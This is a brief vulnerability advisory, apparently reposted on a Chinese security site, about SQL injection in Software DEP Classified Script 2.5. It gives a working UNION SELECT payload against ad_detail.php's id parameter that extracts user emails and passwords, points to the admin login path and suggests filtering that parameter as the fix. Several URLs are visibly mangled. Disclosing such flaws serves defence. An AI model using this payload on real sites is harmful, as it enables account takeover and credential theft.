-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Software DEP Classified Script 2.5 SQL Injection Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 作者: h0rd h0rd[at]null.net http://h0rd.net 下载 地址: http://HdhCmsTestsoftwaredep测试数据/classified-script. html 测试方式: http://HdhCmsTest2cto测试数据 /ad_detail.php?id=null union select 1,2,3,4,concat(email,0x3a,0x3a,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 from user-- 登陆页面: http://[host]/[script]/admin/ HdhCmsTest2cto测试数据提供修复: 过滤ad_detail.php页面id参数输入
查看更多关于Software DEP Classified Script 2.5 SQL注射及修复 - 网站安的详细内容...